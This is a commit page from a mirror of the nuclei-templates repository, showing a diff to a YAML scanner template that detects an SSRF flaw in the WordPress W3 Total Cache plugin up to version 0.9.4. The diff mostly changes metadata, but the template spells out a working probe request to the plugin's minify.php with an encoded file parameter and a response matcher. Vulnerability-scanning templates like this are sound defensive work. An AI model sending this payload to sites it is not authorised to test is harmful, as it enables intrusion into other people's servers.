daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update w3c-total-cache-ssrf.yaml

patch-1
Ritik Chaddha 2022-08-10 14:43:01 +05:30 committed by GitHub
parent 0ebe9f0b8f
commit 37c98909c9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
View File

@ -1,21 +1,23 @@
id: w3c-total-cache-ssrf
info:
name: Wordpress W3C Total Cache <= 0.9.4 - Unauthenticated Server Side Request Forgery (SSRF)
name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)
author: random_robbie
severity: medium
description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
description: |
The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
reference:
- https://wpvulndb.com/vulnerabilities/8644
- https://klikki.fi/adv/w3_total_cache.html
tags: wordpress,wp-plugin,cache,ssrf
tags: wordpress,wp-plugin,cache,ssrf,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'
matchers:
- type: word
part: body
words:
- "NessusFileIncludeTest"
part: body